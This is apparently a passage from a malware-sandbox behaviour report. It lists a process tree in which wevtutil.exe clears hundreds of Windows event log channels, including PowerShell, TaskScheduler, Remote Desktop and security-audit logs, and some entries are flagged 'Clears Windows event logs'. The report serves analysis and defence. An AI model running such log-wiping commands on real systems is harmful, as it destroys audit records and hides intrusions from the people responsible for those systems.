C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HAL/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Help/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-HttpService/Trace"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKE/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Known Folders API Service"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MCT/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NTLM/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetShell/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Recovery/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sens/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Setup/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StorPort/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Superfetch/Main"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TunnelDriver"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UAC/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"3⤵
-
